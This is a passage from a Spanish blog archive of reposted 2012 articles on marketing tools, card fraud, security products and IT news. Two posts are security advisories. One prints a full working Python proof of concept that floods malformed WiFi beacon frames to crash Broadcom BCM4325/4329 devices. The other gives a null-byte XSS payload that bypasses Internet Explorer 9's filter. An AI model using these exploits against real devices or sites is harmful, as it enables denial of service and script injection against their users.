martes, 30 de octubre de 2012

Cómo Medir El Éxito O Fracaso De Una Campaña Con Google Trends

Google Trends representa una herramienta sencilla, gratuita y muy práctica para cualquier persona que desee realizar comparativas y análisis de tendencias y repercusión.



Esta herramienta funciona con la sencillez y efectividad a la que nos tiene acostumbrado Google; introduciendo nombres, datos o variables separados por comas, nos ofrece velozmente una comparativa gráfica de las mismas. El gráfico es un análisis basado en la búsqueda de dichos términos a lo largo del tiempo en el buscador, ofreciendo una perspectiva global de asombrosa precisión.

Además, podemos hacer una segmentación exhaustiva por países e incluso la herramienta nos ofrecerá una segmentación detallada de ciudades o regiones en las que se realiza esa búsqueda.

Otra funcionalidad es detallar con símbolos noticias que Google registra en determinadas fechas. Observaremos que generalmente las noticias coinciden con picos de mayor búsqueda de los términos que analicemos.

Vamos a poner un ejemplo: si queremos analizar y comparar dos marcas como Coca Cola y Pepsi, Google Treds nos ofrecerá una comparativa de las dos marcas en todo el mundo y desde 2004.



Como podemos observar, Coca Cola, a nivel global, muestra una clara superioridad. Pero, ¿qué pasa si segmentamos aún más de manera geográfica y pedimos datos del mercado norteamericano? En este caso, Google Trends nos ofrece los siguientes datos, donde observamos la clara superioridad de Pepsi en el pasado y que poco a poco se va reduciendo.



Podemos realizar incluso variables en el tiempo, para analizar, por ejemplo, los últimos 12 meses, permitiéndonos ver con más precisión las coincidencias entre noticias relevantes y búsquedas globales. Si observamos el pico de Pepsi en febrero de 2012 (H) nos damos cuenta de que coincide con la noticia del despido de 8.700 trabajadores a nivel mundial.

Esto ayuda a ver con más claridad lo importante que es la notoriedad, con noticias o campañas.



Un ejemplo más concreto, y también relacionado con Social Media. La empresa de desodorantes Old Spice llevó a cabo una campaña poco convencional a través de Twitter y Vimeo apoyada por uno spot interactivo muy divertido donde Terry Crews, el exjugador de fútbol americano y actor, tocaba múltiples instrumentos utilizando solamente sus músculos , y consiguió viralizarse por toda la red y llegar a personas o incluso mercados que nunca se habían planteado. ¿Cómo podemos saber si fue un éxito a través de Google Trends?


Old Spice Muscle Music from Terry Crews on Vimeo.

Muy sencillo, buscaremos Old SPice y un competidor suyo, por ejemplo AXE. Podemos ver la superioridad de AXE en el mercado norteamericano durante los últimos meses, sin embargo, a partir del lanzamiento de la campaña mencionada, la popularidad de Old Spice se dispara. En el punto álgido de la campaña supera con creces la popularidad de AXE y eso queda reflejado en Google Trends.



En definitiva, una maravillosa herramienta gratuita, que nos permitirá ver la diferencia, por ejemplo, entre dos marcas competidoras en un mismo mercado, o ver la diferencia de “éxito” de un término dependiendo de la zona geográfica en la que lo busquemos. También sirve para observar la estacionalidad de las búsquedas, la cual en ocasiones resulta sorprendente o ver las cambiantes tendencias de las búsquedas y lo relacionadas que están con el mundo off-line.


El Blog de la Publicidad, el Marketing, los Social Media y la Comunicación
Seguimos en contacto? Puedes “comunicarte” conmigo también en Twitter, Facebook, LinkedIn, comunica2punto0 o Google+. EMPECEMOS YA!!!



Fuente: comunica2punto0.comhttp://comunica2punto0.com/2012/10/30/como-medir-el-exito-o-fracaso-de-una-campana-con-google-trends/






Follow Me on Pinterest

Mention presenta su herramienta de monitorización de medios sociales, en español



Después de varios meses en Beta, Mention.net ve la luz como una opción que permite que cualquiera pueda crear alertas con su nombre, su marca o las de su competencia y estar así informado en
tiempo real sobre cualquier mención en la web o en las redes sociales.
Existe versión web, instalable y para dispositivos móviles, permitiendo rastrear información en prensa, blogs, foros, vídeos, imágenes y demás tipo de contenido en la web y en las redes sociales, definiéndose como “la reinvención de Google Alerts”, ya que podemos crear una o muchas alertas y ser notificado en tiempo real acerca de qué se está diciendo.
La herramienta usa una aplicación interna “anti-ruido” para evitar spam e información poco útil, destacando las menciones prioritarias en su sistema (prioridades definidas según el autor de la fuente, la influencia del autor y el comportamiento del usuario).
Existe una versión gratuita limitada en número de alertas, estando ya disponible en es.mention.net.

Fuente: http://wwwhatsnew.com

Charla Seguridad de la información " Los Retos de la nube"

Seguridad de la
información

Los retos de la nube

Fecha:

30.10.12

Lugar:



Agenda - 30.10.12

9:15h
Recepción de los asistentes
9:30h
Saludo y bienvenida:
D. Javier López Tazón Director - ARIADNA
Dª. Marta Martínez Alonso Vicepresidenta de Global Technology Services - IBM
Preside y modera
D. Javier López Tazón Director - ARIADNA
9:45h
Ponencia Inaugural
D. Gianluca D´Antonio
Presidente - ISMS FORUM SPAIN
CISO - GRUPO FCC
Miembro del Consejo de Expertos - ENISA
10:15h
Smartcities: La confianza del ciudadano y la transparencia de la información.
D. Manuel Escalante Director General - INTECO
D. José Miguel González Aguilera Gerente de Informática - AYUNTAMIENTO DE MADRID
D. Javier Gil Director de Smarter Cities - IBM
11.00h
Café
Preside y modera
D. Ricardo Pérez Profesor de Sistemas de Información - IE
11.30h
La Seguridad en la nube; territorialidad y cloud
El perímetro está en la identidad
Gestión de técnicas de acceso, federación de identidades
Dª. Nieves Franco Directora Comercial - ARSYS
D. Héctor Sánchez Montenegro Director de Tecnología - MICROSOFT
D. Juan Claudio Agüi Manager Oferta de Servicios, Global Technology Services - IBM
12.15h
Seguridad y privacidad en los dispositivos móviles
Problemas de seguridad
Medidas para prevenir las amenazas
D. Ignacio Heras Responsable de Marketing - G-DATA
D. David Alonso Responsable de B2B de la División de Telecomunicaciones - SAMSUNG ELECTRONICS
13.00h
Mesa de debate abierta:
El manejo del riesgo, actores que amenazan la seguridad
Situaciones de inseguridad ocasionadas por ataques, desastres naturales o diversas contingencias. Un debate para conocer las distintas causas de posibles amenazas y las posibles soluciones a los mismos.
D. Emilio Castellote Director de Marketing de Producto - PANDA
D. Víctor Domingo Presidente - AI
D. Javier Maestre Abogado - BUFET ALMEIDA
D. Manuel Carpio Director de Seguridad de la Información y Prevención del Fraude - TELEFÓNICA
14.00h
Cóctel

Ponentes

D. David Alonso Responsable de B2B de la División de Telecomunicaciones - SAMSUNG ELECTRONICS D. Manuel Carpio Director de Seguridad de la Información y Prevención del Fraude - TELEFÓNICA D. Emilio Castellote Director de Marketing de Producto - PANDA D. Juan Claudio Agüi Manager Oferta de Servicios, Global Technology Services - IBM D. Gianluca D´Antonio Presidente - ISMS FORUM SPAIN CISO - GRUPO FCC Miembro del Consejo de Expertos - ENISA D. Víctor Domingo Presidente - AI D. Manuel Escalante Director General - INTECO
Dª. Nieves Franco Directora Comercial - ARSYS D. Javier Gil Director de Smarter Cities - IBM D. José Miguel González Aguilera Gerente de Informática - AYUNTAMIENTO DE MADRID D. Ignacio Heras Responsable de Marketing - G-DATA D. Javier López Tazón Director - ARIADNA D. Javier Maestre Abogado - BUFET ALMEIDA Dª. Marta Martínez Alonso Vicepresidenta de Global Technology Services - IBM D. Ricardo Pérez Profesor de Sistemas de Información - IE D. Héctor Sánchez Montenegro Director de Tecnología - MICROSOFT

Localización

Hotel InterContinental
Paseo de la Castellana, 49.
28046 - Madrid
España
Ver en Google Maps
Prensa

Tarjetas bancarias. Consumo y Fraude.

Las tarjetas bancarias han supuesto un gran avance para el consumidor y constituyen el producto financiero de los Bancos por excelencia, permitiendo un cómodo acceso al consumidor a distintas operaciones, tales como: pago por medios electrónicos para las compras en línea a través de Internet, retirada y depósito de efectivo en un cajero, pago en establecimientos con TPV en línea u off-line, entre otras.
Sin duda, para muchos consumidores, entre la multitud de operaciones que ofrece una tarjeta bancaria, comprar o contratar sin pagar en el momento de la operación o contratación del servicio es una situación tentadora y a su vez engañosa, pues puede generar problemas en el consumidor a la hora de hacer frente a sus obligaciones. El uso responsable y adecuado de la tarjeta implica evitarse problemas posteriores al iniciarse el cobro por parte de las instituciones bancarias y tener consecuencias comprometedoras con su patrimonio.
A continuación exponemos información relevante para un uso diligente de su tarjeta bancaria, la realidad fraudulenta que se produce en numerosas ocasiones y las medidas preventivas ante un robo o pérdida de la misma.
- DERECHOS Y DEBERES DEL TITULAR DE UNA TARJETA BANCARIA
Todo titular de una tarjeta bancaria debe conocer en el momento de la celebración del contrato los derechos, que le permitirá proteger sus legítimos intereses económicos:
- Abonar la adquisición de productos o servicios, utilizando la tarjeta bancaria para ello.
- Retirar y depositar dinero en efectivo en cajeros automáticos y en las ventanillas de los Bancos.
- Recibir un copia o duplicado del contrato de la tarjeta bancaria.
- Recibir en su domicilio los extractos de liquidación.
- Avisarle de cualquier cambio de política que haya tomado el Banco y le afecte como cliente.
- El cliente tendrá derecho a desistir del contrato, dejando sin efecto el contrato celebrado, notificándoselo así a la otra parte contratante en el plazo establecido para el ejercicio de ese derecho, sin necesidad de justificar su decisión y sin penalización de ninguna clase.
y sus deberes, sujetos al patrimonio del cliente:
- Abonar las comisiones que le cobre su entidad bancaria.
- Devolver o reintegrar el dinero desembolsado en bienes y servicios en la forma estipulada en el contrato.
- Informar a su Banco de la situación económica o personal.
- Conservar su PIN adecuadamente.
- ROBO Y PÉRDIDA DE UNA TARJETA BANCARIA
Siempre se ha aconsejado que es recomendable no llevar encima todas las tarjetas bancarias de las que hagamos uso y llevar la cartera en un lugar seguro, pues existe el riesgo de que podamos perderlas o incluso que nos las roben.
En estos casos, cuando descubramos que han desparecido nuestras tarjetas bancarias debemos comunicarnos de la forma más rápida con nuestra entidad bancaria que nos ha emitido la tarjeta o con la central de las empresas de tarjetas de crédito (VISA, MasterCard, American Express, Diners Club International, …). El teléfono de Atención al cliente suele estar las 24 horas disponibles y podemos encontrarlo en los cajeros automáticos o en el mismo contrato; si no disponemos de esta inmediatez, podemos anotarnos el número de teléfono en nuestro móvil. Cuando podamos comunicar con la entidad bancaria pediremos que bloqueen aquellas tarjetas que hayan desaparecido de nuestra posesión, de manera que nadie pueda hacer uso de ellas desde ese mismo instante.
Sería esencial que apuntáramos la fecha y la hora con la que nos hemos comunicado con el teléfono de Atención al cliente de la entidad bancaria, de manera que podamos prevenir posibles reclamaciones en el caso de que no se hubiera ejecutado la anulación o bloqueo de la tarjeta. Por otro lado, es más recomendable presentar una denuncia en la comisaría más cercana, donde se hará constar en documento oficial de la hora y fecha de la pérdida o robo de la tarjeta bancaria.
Tras la cancelación de las tarjetas, debería comprobar si se ha realizado algún tipo de transacción que no reconozca como suyas; de ser así, aquellas transacciones que se hayan llevado a cabo con posterioridad al aviso de bloqueo de las tarjetas, la responsabilidad será de la entidad bancaria.
- EL FRAUDE Y LAS MEDIDAS PREVENTIVAS
Existen numerosos tipos de fraude que pueden involucrar nuestras tarjetas de crédito y pueden comprometer nuestro patrimonio. Podemos destacar entre todas ellas:
- la pérdida o robo de la tarjeta bancaria,
- robo de identidad,
- el correo emitido por el banco que se desvía de su destinatario y el delincuente se hace con la tarjeta que hay en su interior,
- copiado de banda magnética,
- phishing, y otras más.

Esto puede provocar que se hagan cargos no autorizados a la tarjeta de crédito o que los delincuentes hagan tarjetas falsas con el número de cuenta de la víctima.
Los ladrones de identidad hacen uso fraudulento de la información personal de alguien para cometer un fraude financiero, pudiendo incomodar a sus víctimas usando sus nombres y demás información personal para cometer delitos abrir nuevas cuentas de crédito y obtener acceso a crédito y cuentas de banco existentes. Aunque las víctimas del robo de identidad no son consideradas responsables de los delitos, les cuesta mucho trabajo probar el fraude y limpiar el caos financiero causado por los delitos.
El copiado de banda magnética o skimming se trata de otro uso fraudulento de tarjeta bancaria. Los delincuentes hacen una copia ilegal de una tarjeta de crédito o bancaria usando un dispositivo que lee los números y demás información de las tarjetas de crédito (skimmers) y reproduce la información de la tarjeta original. Una vez capturada la información, los delincuentes pueden venderlas o pagar artículos por teléfono o Internet.
Por otro lado, se habla de phishing cuando los delincuentes envían una cantidad enorme de mensajes por correo electrónico haciéndoles creer al consumidor que los mensajes vienen de su Banco, tratando de conseguir que la víctima potencial revele los números de cuenta del banco. El crimen tiene éxito porque los mensajes de correo electrónico parecen legítimos, con logotipos bancarios realistas y sitios web o URLs que son muy parecidos a los reales.
Las medidas preventivas anti-fraude pueden resumirse de la siguiente manera:
- Es preferible utilizar tarjetas de crédito, tanto para operaciones online como en comercio físico, pues éstas permiten devolver los cargos, de manera que el fraude no se consuma.
- Pueden utilizarse tarjetas de prepago o monedero que son aquéllas que para poder utilizarlas se debe realizar una recarga, esto es, realizar un ingreso a la propia tarjeta.
- Limitar las cantidades diarias de gasto o disposición en cajeros y operaciones físicas offline.
- Conocer si la compra online tiene una validación de seguridad.
- FUTURO DE LAS TARJETAS BANCARIAS
El futuro de las tarjetas bancarias viene de la mano de Japón. La empresa Fujitsu ha desarrollado una nueva tecnología que ya ha sido implantada en los cajeros automáticos de Tokio y en los que las tarjetas bancarias serán sustituidas por la huella digital, con la que se puede hacer distintas operaciones bancarias.
Si se  logra sustituir exitosamente las tarjetas bancarias por la huella digital, aquéllas tendrán los días contados.
Editado:
Javier Girón
Fuentes utilizadas y enlaces de interés:
* http://ignaciodemiguel.es/
* http://www.tarjetasdecredito.pro
* http://www.consumer-action.org

IBM presenta diez nuevas soluciones de seguridad para empresas

COTIZACIONES RELACIONADAS

SímboloPrecioCambio
IBM193,27
MADRID, 25 (Portaltic/EP)
IBM (NYSE: IBM - noticias) presenta diez nuevas soluciones de seguridad para afrontar los desafíos del Big Data, los dispositivos móviles y el 'cloud computing'. Se trata del mayor anuncio de la compañía respecto a nuevas competencias de software de seguridad analítica.
La compañía lanza diez productos y mejoras pensadas para hacer frente a las amenazas de seguridad que han surgido por el aumento en el consumo de las nuevas tecnologías emergentes. Amenazas a la seguridad que afectan a las personas, la información, las aplicaciones y la infraestructura.
Una de las principales causas de preocupación de los directivos es cómo garantizar la seguridad de sus datos en el tiempo real fuera de la tradicional seguridad de la empresa, según el estudio de IBM 2012 Global Reputational Risk and IT.
Las características del nuevo software de IBM pretenden ayudar a los clientes a conseguir un mejor control de la seguridad de los dispositivos móviles, mitigar las amenazas internas y externas y reducir los riesgos de seguridad en los entornos cloud.
Además, las nuevas capacidades de software permiten agrandar la seguridad de las bases de datos para obtener conocimiento en tiempo real acerca de los entornos de información masiva como Hadoop, y automatizar la gestión de la seguridad de la información.
Las nuevas tecnologías vanguardistas, incluidos entornos basados en Hadoop, son una puerta abierta a nuevas posibilidades, asegura la compañía. Sin embargo, generan nuevos riegos y amenazas más complejas. Las empresas, por su parte, han de cumplir con un número cada vez mayor de regulaciones que los enfoques tradicionales de protección de la información no son capaces de cumplir la mayoría de las veces.
IBM ha anunciado, también, mejoras de la gestión del encriptado que ayudará a las organizaciones a automatizar la recuperación clave y cumplir con el nuevo protocolo de interoperabilidad de administración de claves KMIP (Key Management Interoperability Protocol).
En cuanto a los dispositivos móviles, IBM ha anunciado un control de autenticación para usuarios de este entorno además de la integración de la gestión del acceso en el desarrollo y la implantación de aplicaciones móviles y un control mejorado de estos dispositivos.
Con el lanzamiento de las nuevas capacidades de gestión de acceso, IBM ofrece ahora un mayor control del acceso en función del contexto, una mejor protección contra las amenazas y un control mejorado del dispositivo móvil.
Para el universo cloud, IBM ha presentado una serie de alternativas que ofrecen una visibilidad renovada, mayores niveles de automatización y una gestión de los parches que ayudan a prevenir el acceso no autorizado. Todo esto, permite la defensa frente a las amenazas más recientes, mediante una inteligencia de seguridad avanzada.
Las nuevas soluciones de seguridad de datos incluyen:
- IBM InfoSphere Guardium para Hadoop (nueva)
- IBM InfoSphere Optim Data Privacy (mejorada)
- IBM Tivoli Key Lifecycle Manager (mejorada)
Las nuevas soluciones de seguridad móvil incluyen:
- IBM Security Access Manager for Cloud and Mobile (nueva)
- IBM Endpoint Manager for Mobile Devices (mejorada)
Las nuevas soluciones de seguridad cloud incluyen:
- IBM SmartCloud for Patch Management (nueva)
- IBM Security Access Manager for Cloud and Mobile (nueva)
- IBM Security Privileged Identity Manager (nueva)
- QRadar SIEM y QRadar Log Manager (mejorada)

Fuente: http://es.finance.yahoo.comhttp://es.finance.yahoo.com/noticias/ibm-presenta-diez-soluciones-seguridad-125712612.html

Denegación de servicio a multitud de Smartphones via WiFi

Se ha publicado una vulnerabilidad presente en determinados Chipset de la firma Broadcom, en especial los modelos BCM4325/29 integrados en multitud de dispositivos inalámbricos como smartphones, tablets e incluso vehículos (como el Ford Edge).
El fallo permitiría realizar una denegación de servicio al módulo inalámbrico e incluso la revelación de información sensible según los propios investigadores. El fallo podría reproducirse atacando directamente al módulo WiFi independientemente del sistema operativo presente en el dispositivo.
La vulnerabilidad (CVE-2012-2619) reportada por el laboratorio de CoreLabs (Core Security Technologies) fue descubierta por el investigador argentino Andrés Blanco, del que hizo pública demostración durante la pasada Ekoparty en Buenos Aires, Argentina. Su compañero Matias Eissler desarrolló la prueba de concepto totalmente funcional.
Mediante estudios de ingeniería inversa consiguieron comprender la estructura del firmware de los dispositivos Broadcom, hallando la forma de alterar el tráfico WiFi (normativa IEEE 802.11) de tal manera que afectara a dichos dispositivos inalámbricos, a través del envío de tramas RSN (IEEE 802.11i, WPA/WPA2) especialmente manipuladas.
El protocolo RSN (Robust Security Network) interviene en la negociación y establecimiento del tipo de autenticación y cifrado utilizado durante una sesión WPA/WPA2.
En coordinación con los investigadores y el US-CERT, Broadcom facilitó a los diferentes fabricantes (Apple, HTC, Motorola, Sony, Nokia, Samsung...) un nuevo firmware que impide la vulnerabilidad para integrarlo en sus dispositivos, por lo que se da como subsanada.
Los dispositivos afectados con el chipset BCM4325:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad
Y la prueba de concepto realizada por Matias Eissler:
------------------------- poc.py -------------------------
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
    sequence = 0
    while(1):
        sequence = sequence % 4096
        # Frame Control
        frame  = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
        frame += '\x00' # Flags: 0
        frame += '\x00\x00' # Duration: 0
        frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
        frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
        frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
        frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
        # Frame Body
        frame += struct.pack('Q', time.time()) # Timestamp
        frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
        frame += '\x11\x04' # Capability Information: ESS, Privacy,
Short Slot time
        # Information Elements
        # SSID: buggy
        frame += '\x00\x05buggy'
        # Supported Rates: 1,2,5.5,11,18,24,36,54
        frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
        # DS Parameter Set: 6
        frame += '\x03\x01\x06'
        # RSN IE
        frame += '\x30' # ID: 48
        frame += '\x14' # Size: 20
        frame += '\x01\x00' # Version: 1
        frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
        frame += '\x01\x00' # Pairwise cipher suite count: 1
        frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
        frame += '\xff\xff' # Authentication suites count: 65535
        frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
        frame += '\x00\x00'
        sequence += 1
        yield frame
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "Usage:"
        print "\t%s <wireless interface>" % sys.argv[0]
        sys.exit(-1)
    iface = sys.argv[1]
    context = PyLorcon2.Context(iface)
    context.open_injmon()
    generator = beaconFrameGenerator()
    for i in range(10000):
        frame = generator.next()
        time.sleep(0.100)
        context.send_bytes(frame)

Más información:
VU#160027: Broadcom BCM4325 and BCM4329 wireless chipset
denial-of-service vulnerability
Broadcom DoS on BCM4325 and BCM4329 devices
One firmware to monitor 'em all
José Mesa Orihuela

Así son las cajas de Office 2013

office packaging leak 630x293 Así son las cajas de Office 2013
Microsoft Office está a punto de llegar al mercado con novedades interesantes e integración Windows 8. De hecho, el próximo lunes recibiremos la visita de Microsoft para presentarnos las novedades del mismo y os las mostraremos en directo.
Acaba de filtrarse cómo serán las cajas del nuevo software de ofimática de Microsoft que estará disponible el primer trimestre del próximo año. Los usuarios que compren a día de hoy la versión Office 2010  -realmente desde el 19 de octubre- recibirán la actualización gratuita a Office 2013 cuando esté disponible.
Quienes adquieran un dispositivo Windows RT también recibirán una versión preview de Office 2013

Fuente: muycomputer

4 grandes herramientas de analítica para Twitter

El crecimiento que Twitter ha tenido durante los últimos años como una plataforma de marketing importante para las marcas con presencia online, ha provocado que las herramientas de análisis para la red social del microblogging sean cada vez más indispensables para las empresas.
Como en cualquier otra estrategia, tanto en línea como offline, medir los resultados que se están obteniendo en Twitter y monitorear la actividad propia y de los seguidores, es sumamente importante ya que gracias a esta actividad es posible identificar aquellos aspectos no están teniendo la respuesta espera por lo que necesitan rediseñarse así como los que están dando resultados óptimos para reforzarlos, al mismo tiempo que es una buena manera de conocer al público objetivo y conocer sus necesidades.
Existen muchas métricas en esta red social que necesitan ser consideradas por las marcas para impulsar sus estrategias de marketing dentro de la misma plataforma, así como una buena cantidad de herramientas que facilitan este trabajo.
En este sentido, compartimos con nuestros lectores cuatro útiles herramientas de análisis que facilitarán la medición de resultados el Twitter:
1.-FollowerWonk
Es una herramienta que trabaja en función de palabras clave para identificar a los usuarios más activos que siguen a una cuenta determinada y, en general, a los más influyentes de determinado sector.
De esta manera ofrece un amplio análisis en el ofrece detalles muchos detalles sobre los seguidores de una cuenta, indicando desde quiénes son -nombre de perfil, sexo, idioma, sector de interés, que cuentas siguen y por quién son seguidos, entre otras cosas-, en dónde se encuentran -da seguimiento a un perfil en función de la ubicación de los usuarios- hasta el qué y cómo tweetean -número de tweets, temas más recurrentes, las horas más activas de cada cuenta y los hashtags más utilizado, por ejemplo-.
Además puede comparar la actividad de diferentes perfiles y plasmar los resultados en en gráficas y un reporte detallado, los cuales pueden ser compartidos a través de otros medios digitales.
2.-TweetStats
Gracias a esta herramienta, los usuarios serán capaces de medir toda su historia en Twitter, ya que ofrece información detallada sobre el número total de tweest publicados por mes, desglosada en días de la semana.
Así se podrá tener un control sobre los seguidores que responden con mayor frecuencia a un mensaje, el número de publicaciones que han recibido un retweet y tener conocimiento de del total de tweets enviados y recibidos por día y hora, para identificar los momentos con más tráfico dentro de una cuenta.
Además cuenta con una función que representa visualmente los temas y hashtags más utilizado en los tweets de la audiencia y la frecuencia con la que estos son tocados en las publicaciones.
3.-TwentyFeet
Iniciando sesión con la cuenta propia de Twitter, este servicio analiza seguidores, retweets, menciones, listas y número de unfollow recibidos.
Estos datos se pueden conocer en un período de tiempo determinado y fijado por el mismo usuario.
Al mismo tiempo ofrece un reporte sobre la influencia de cada cuenta tomando como referencia indicadores como el número de conversaciones establecidas, las menciones del perfil o de una palabra clave relacionada con el mismo y el número de retweets que recibe un mensaje, entre otros.
Además, gracias a este servicio, también se puede tener un control de la actividad en otras plataformas digitales como Facebook, Google Analytics, Youtube, MySpace y bit.ly.
4.-PostPost
Es un buscador de la red social del microblogging que permite realizar búsquedas dentro de la línea del tiempo de cada cuenta por palabras claves, nombre de algún seguidor, o un hashtag específico.
Al realizar la búsqueda, esta herramienta mostrará resultados encontrados con base en toda la actividad del usuario en Twitter.
Por: Fernanda González
Fuente: vuelodigital

domingo, 28 de octubre de 2012

¿Que sistema operativo es para ti el mas estable y seguro?

Participa en nuestro grupo y danos tu opinión ¿Que sistema operativo es para ti el mas estable y seguro?:

El mejor antivirus del “cibermundo” y además gratuito



   Está claro que para muchos internautas la protección de sus ordenadores, tablets o smartphones no es un tema que les inquiete. En su “cibermundo” son ajenos a los peligros que nos podemos encontrar en la red y por consiguiente también lo son a sus graves consecuencias.
   Son de los que desoyen las sabias frases del refranero español como “más vale prevenir que curar”, desatienden la seguridad de sus equipos informáticos en perjuicio de su propia seguridad y privacidad.
   Esto me recuerda una histórica frase, según una extendida leyenda, en la que se cuenta que Boabdil “el Chico”, último rey moro de Granada,  al salir de la ciudad tras ser reconquistada por los Reyes Católicos, y camino de su exilio , volvió la cabeza para ver su ciudad por última vez y lloró, por lo que su madre se dirigió a su hijo con esta histórica frase (de forma bastante machista, por cierto):
“Llora como mujer lo que no supiste defender como hombre…”
   Esta cita, hoy en día, se utiliza dándole un significando a la inutilidad de las lágrimas derramadas a destiempo, y que en nuestros “ciberdías” podríamos adaptarla y versionarla como:
“Llora como “inconsciente” lo que no supiste defender como “internauta seguro”…”
   Bien, como sabéis desde este blog se prentende informar de los peligros potenciales que existen en la red para poder evitarlos con medidas preventivas, o mitigarlos una vez afectados para que sus consecuencias sean los menos “molestas” posibles.
   En el caso de las vulnerabilidades que, afectan a nuestros equipos, con ayuda de los conocidos y molestos “ciberbichitos” de todo tipo que aprovechan el más mínimo “agujerito” (bug) en nuestros sistemas informáticos, disponemos de infinidad de soluciones antivirus, tanto comerciales como gratuitas.

   Se ha realizado un exhaustivo estudio, de las principales soluciones antivirus, desde el “Departamento Técnico” de “El blog de Angelucho” en colaboración con las más prestigiosas Universidades en todo el mundo y de cuya cantera nacen los mejores y mas preparados Ingenieros “Sociales”, así como la participación activa de los “Juakes” mas peligrosos y prestigiosos del “mundo mundial”. ;-)
   Una vez terminado el laborioso estudio, y tras un análisis minucioso de los pros y los contras de cada una de las soluciones antimalware analizadas, queremos hacer público el resultado final del mismo aportando la mejor solución para evitar que nuestros equipos puedan verse afectados e “infectados” por virus y malware.
   El mejor antivirus es…

Mira detrás de tu teclado

¡EL MEJOR ANTIVIRUS ERES TÚ!

Como véis en esta entrada, en tono de humor, no quiero mas que reforzar lo que siempre os digo:

Nosotros mismos somos nuestra peor vulnerabilidad pero también somos nuestro mejor antivirus.

Nos vemos en la red

Internet Explorer 9 XSS Filter Bypass

El 18 de octubre, Jean Pascal Pereira ha descubierto una forma de saltear el filtro de XSS implementado por Internet Explorer 9.

El navegador ofrece una función para eliminar patrones sospechoso de ataques de Cross-site Scripting en los parámetros brindados a cada página web.

En la prueba de concepto publicada en Bugtraq se explica que el truco consiste en insertar nullbytes en medio de la cadena de ataque de XSS cada vez que se construye un enlace a través del tag A, de la siguiente manera:

[a href = '= http://localhost/ieb/blah.php?a alerta [s[NULL]cript] (1) [/s[NULL]cript]'] ClickMe [/a]


Actualmente no hay una solución para esta vulnerabilidad.

Cristian de la Redacción de Segu-Info

Sitios "parasitos" que se alimentan de nuestras fotos y videos

Hoy en día es común encontrar en las redes sociales fotos de niños y adolescentes "haciendo poses", probando diferentes looks para la próxima fiesta o mostrando sus sonrisas y las de sus amigos en la reunión del fin de semana.

Lo que antes podía limitarse a un juego frente al espejo hoy no conoce límites geográficos y llega a lugares inesperados de la mano de los dispositivos móviles, conectados a las redes sociales durante las 24 horas. Las fotos que antes debían superar el proceso de revelado y revisión de la familia hoy saltan a la red en segundos, con solo un clic.

Todo comienza como un juego y, el deseo de compartir con sus amigos o la necesidad de destacarse, de ser diferentes, hace que todo sea publicado: pensamientos, frases, canciones y fotos.

Actualmente, miles de imágenes con contenido considerado sexualmente explícito son publicadas por niños y adolescentes, imágenes de ellos mismos y de otros. Luego, esas imágenes son robadas por sitios dedicados a la pornografía.

Según un estudio realizado por Internet Watch Foundation (IWF), el 88% de las imágenes o videos con contenido sexual o sugestivo publicado por jóvenes en las redes sociales, son tomadas desde su ubicación original y subidas en otros sitios. Durante 47 horas, en un período de 4 semanas, fueron analizadas y registradas un total de 12.224 imágenes y videos. La mayoría de ellos fueron tomados luego por "sitios parásito", creados con el único objetivo de publicar imágenes y videos sexualmente explícitos de jóvenes.

"Esta investigación da un indicio inquietante del número de imágenes y vídeos que muestra a jóvenes realizando actos sexuales explícitos o posando en Internet. También pone de manifiesto el problema del control sobre estas imágenes -una vez que una imagen se ha copiado en un sitio web parásito, ya no basta con eliminar la imagen de la cuenta en línea. Necesitamos que los jóvenes se den cuenta que cuando una imagen o video esta en línea, nunca podrán eliminarlo completamente", expresó Susie Hargreaves, CEO de Internet Watch Foundation.

El informe también recoge la experiencia de los jóvenes, donde ellos cuentan como su vida y la relación con su familia y amigos se ven afectadas luego de conocer que sus fotos fueron publicadas en sitios dedicados a la pornografía.

Las organizaciones advierten a niños y jóvenes sobre el peligro del “sexting” –envío de mensajes de texto o correos electrónicos con contenido sexual explícito- y el permitir que sus amigos tomen imágenes o videos sugestivos de ellos, para que sean consientes de que una vez que una imagen es publicada ya no esta bajo su control.

El problema no solo se limita a las imágenes que son publicadas voluntariamente, por desconocimiento del destino que las mismas pueden tener. En caso del robo o pérdida de alguno de los dispositivos utilizados, se pierde por completo el control sobre esas fotos y las misma podrán ser utilizadas por terceros.

Como adultos, debemos comprometernos a compartir nuestra experiencia tanto con niños y jóvenes como en nuestro entorno. Educarnos y aprender sobre los peligros existentes en la red y el uso responsable de la tecnología es, sin dudas, la mejor manera de protegernos y proteger a los demás.

Traducción: SoloE
Fuente consultada (en ingles): The Guardian

Primeros pasos con BackTrack 5 (Parte 1)

Aprovechando que he tenido que cambiar de disco duro, y me he vuelto a reinstalar Backtrack 5, os voy a escribir algunos artículos sobre los primeros (y no tan primeros) pasos que debéis tomar con vuestro Backtrack 5.
Para el que aún no lo sepa, Backtrack es una distribución GNU/Linux orientada a la seguridad informática. En ella, encontraremos muchísimas aplicaciones y herramientas para enfocadas a la mayoría de las ramas de hacking. Por lo tanto, en conjunto, es una herramienta imprescindible para todo aquel interesado en el hacking. Todo el equipo de hacking-etico.com lo utilizamos.
